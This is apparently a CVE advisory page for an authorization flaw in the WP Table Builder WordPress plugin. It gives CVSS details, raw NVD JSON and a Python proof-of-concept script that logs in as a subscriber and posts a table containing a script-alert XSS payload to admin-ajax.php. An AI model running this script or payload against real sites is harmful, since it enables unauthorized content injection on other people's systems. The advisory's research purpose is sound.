Security Vulnerability Report
中文
CVE-2025-13753 CVSS 4.3 MEDIUM

CVE-2025-13753

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42

Description

The WP Table Builder – Drag & Drop Table Builder plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect authorization check on the save_table() function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new wptb-table posts.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Table Builder plugin <= 2.0.19 (所有版本直至并包括2.0.19)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13753 PoC - WP Table Builder Authorization Bypass # Affected: WP Table Builder plugin <= 2.0.19 # Type: Incorrect Authorization Check import requests import sys from urllib.parse import urlencode target_url = "http://target-wordpress-site.com" username = "subscriber_user" password = "user_password" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data, cookies=session.cookies) # Step 2: Create malicious wptb-table post via save_table() # The vulnerability allows Subscriber role to create wptb-table posts save_table_url = f"{target_url}/wp-admin/admin-ajax.php" # Table data payload - can contain malicious content table_payload = { "action": "wptb_save_table", "wptb_table_data": "[{\"row\":0,\"col\":0,\"content\":\"<script>alert('XSS')</script>\"}]", "wptb_table_title": "Malicious Table Created by Subscriber", "post_id": "0", # 0 for new post creation "nonce": "" # May need to extract valid nonce from page source } response = session.post(save_table_url, data=table_payload) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text}") # Step 3: Verify table creation # Check if wptb-table post was created in WordPress admin verify_url = f"{target_url}/wp-admin/edit.php?post_type=wptb-table" verify_response = session.get(verify_url) print(f"Verification - Tables page accessible: {verify_response.status_code == 200}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13753", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:56.833", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Table Builder – Drag & Drop Table Builder plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect authorization check on the save_table() function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new wptb-table posts."}, {"lang": "es", "value": "El plugin WP Table Builder – Drag &amp; Drop Table Builder para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de autorización incorrecta en la función save_table() en todas las versiones hasta la 2.0.19, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, creen nuevas entradas wptb-table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3432381/wp-table-builder", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-13753/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/95f49080-2263-4f6d-9372-30137efd8e10?source=cve", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-13753/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}